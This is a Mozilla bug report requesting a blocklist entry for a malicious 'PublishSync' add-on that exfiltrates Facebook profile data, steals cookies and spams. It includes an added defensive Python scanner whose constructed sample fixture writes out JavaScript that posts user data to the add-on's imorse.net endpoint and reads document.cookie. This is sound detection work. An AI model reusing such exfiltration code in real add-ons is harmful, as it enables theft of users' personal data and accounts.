Bug 730059
Opened 13 years ago
Closed 13 years ago
Malicious "PublishSync" add-on
Categories: Toolkit :: Blocklist Policy Requests (defect)
Status: RESOLVED FIXED
People: Reporter: mhammell, Assigned: jorgev
Attachments (1 file): 324.61 KB, text/plain
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Steps to reproduce:
Add-on downloaded from https://imorse.net/publish-sync/download/firefox/publishsync.xpi
Actual results:
This one is written using Mozilla's JetPack APIs
The add-on injects the following JS files:
client.facebook.js
facebook.js
site_facebook.js
client.facebook.js:
Injects some extra options into our privacy settings page, with specific support for Chinese language/locale
facebook.js:
Attempts to authorize the FB app_id 279629492072378 with these permissions: publish_stream, offline_access, email, and manage_pages
Sends your UID, Name, Email, and Locale to http://imorse.net/publish-sync/facebook/checkaccount
Has logic to check if Facebook returns "you just sent the same message" or "you are sending too fast" warnings when it's posting as you without your knowledge.
site_facebook.js:
Handles stealing your FB cookies
Sends spam with a link to this YouTube video
http://www.youtube.com/watch?v=-ONp6DQL6bM
Injects this ad over our existing Facebook ads:
http://www.lativ.com.tw/Detail/03394021 with this image
https://imorse.net/publish-sync/content/ads/images/2011-09-03_1717.jpg
If your vanity name is 'ValenHsu', it also injects an ad with a link to http://www.facebook.com/FamilyMart?sk=app_167110672433 and an iframe to load a like button for http://www.fever38.com/promotion?promoid=21033
Expected results:
It should not send your personal information to a third-party server without your consent. It should not steal cookies and install a Facebook application to enable posting as you without your consent.
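The behaviours listed in the report can be turned into a static triage check for an .xpi before a blocklist decision is made. What follows is an added example, not the reporter's or Mozilla's code and not the add-on's source (which is not on this page): it opens an XPI in memory (an XPI is a zip), scans each .js entry for the indicators the report names (the Facebook app_id, the checkaccount endpoint, the broad Facebook permissions, document.cookie access, and the "same message"/"sending too fast" throttle strings), and returns a verdict. The sample XPI that build_sample_xpi() assembles is constructed for the demo: the file names, the add-on ID and the indicator strings come from the bug, but the JavaScript bodies are invented stand-ins.

```python
"""Static indicator scan of a Firefox XPI for the behaviours reported above.

Added example. The XPI built by build_sample_xpi() is constructed for this
demo: only the file names, the add-on ID and the indicator strings come from
the bug report; the JavaScript bodies are invented stand-ins, not the real
add-on's source.
"""
from __future__ import annotations

import io
import re
import zipfile

# Indicators taken from the report. fb_app_id and exfil_endpoint are specific
# to this add-on; the other three are generic behaviours that merit review.
INDICATORS = {
    "fb_app_id": re.compile(r"\b279629492072378\b"),
    "exfil_endpoint": re.compile(r"imorse\.net/publish-sync/facebook/checkaccount"),
    "broad_fb_permissions": re.compile(r"\b(publish_stream|offline_access|manage_pages)\b"),
    "cookie_access": re.compile(r"document\.cookie"),
    "spam_throttle_check": re.compile(r"same message|sending too fast", re.IGNORECASE),
}


def scan_xpi_bytes(data: bytes) -> dict[str, list[str]]:
    """Return {path: [indicator, ...]} for every .js entry with at least one hit."""
    findings: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as xpi:
        for info in xpi.infolist():
            if info.is_dir() or not info.filename.endswith(".js"):
                continue  # manifests, images etc. are not scanned here
            text = xpi.read(info).decode("utf-8", errors="replace")
            hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
            if hits:
                findings[info.filename] = hits
    return findings


def verdict(findings: dict[str, list[str]]) -> str:
    """'block' on an add-on-specific indicator, 'review' on two or more generic ones."""
    hit_set = {h for hits in findings.values() for h in hits}
    if hit_set & {"fb_app_id", "exfil_endpoint"}:
        return "block"
    if len(hit_set) >= 2:
        return "review"
    return "clean"


def make_xpi(files: dict[str, str]) -> bytes:
    """Zip a {path: text} mapping into XPI bytes (an XPI is just a zip archive)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as xpi:
        for path, text in files.items():
            xpi.writestr(path, text)
    return buf.getvalue()


def build_sample_xpi() -> bytes:
    """Constructed sample mirroring the three injected files named in the report."""
    return make_xpi({
        # add-on ID from comment 1; not a .js file, so the scanner skips it
        "install.rdf": "<RDF><em:id>psid-vhvxQHMZBOzUZA@jetpack</em:id></RDF>",
        "lib/main.js": "var pageMod = require('sdk/page-mod');\n",
        "data/client.facebook.js": "// adds extra rows to the privacy settings page (zh-TW strings)\n",
        "data/facebook.js": (
            "FB.init({appId: '279629492072378'});\n"
            "FB.login(cb, {scope: 'publish_stream,offline_access,email,manage_pages'});\n"
            "xhr.open('POST', 'http://imorse.net/publish-sync/facebook/checkaccount');\n"
            "xhr.send(JSON.stringify({uid: me.id, name: me.name, email: me.email, locale: me.locale}));\n"
            "if (/you just sent the same message|sending too fast/i.test(err)) { backoff(); }\n"
        ),
        "data/site_facebook.js": (
            "var c = document.cookie;\n"
            "post('http://www.youtube.com/watch?v=-ONp6DQL6bM');\n"
        ),
    })


if __name__ == "__main__":
    found = scan_xpi_bytes(build_sample_xpi())
    for path, hits in found.items():
        print(path, "->", ", ".join(hits))
    print("verdict:", verdict(found))
```

On the constructed sample, facebook.js trips all four non-cookie indicators, site_facebook.js trips cookie_access, and the verdict is "block" because an add-on-specific indicator was hit. A real triage pass would add the add-on ID to the block set and run the same scan over the unpacked XPI on disk; string indicators are cheap to evade, so treat a "clean" result as "nothing obvious", not as a clearance.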
Comment 1 (Assignee) • 13 years ago
Id: psid-vhvxQHMZBOzUZA@jetpack
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Comment 2 (Assignee) • 13 years ago
Status: ASSIGNED → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Updated • 9 years ago
Product: addons.mozilla.org → Toolkit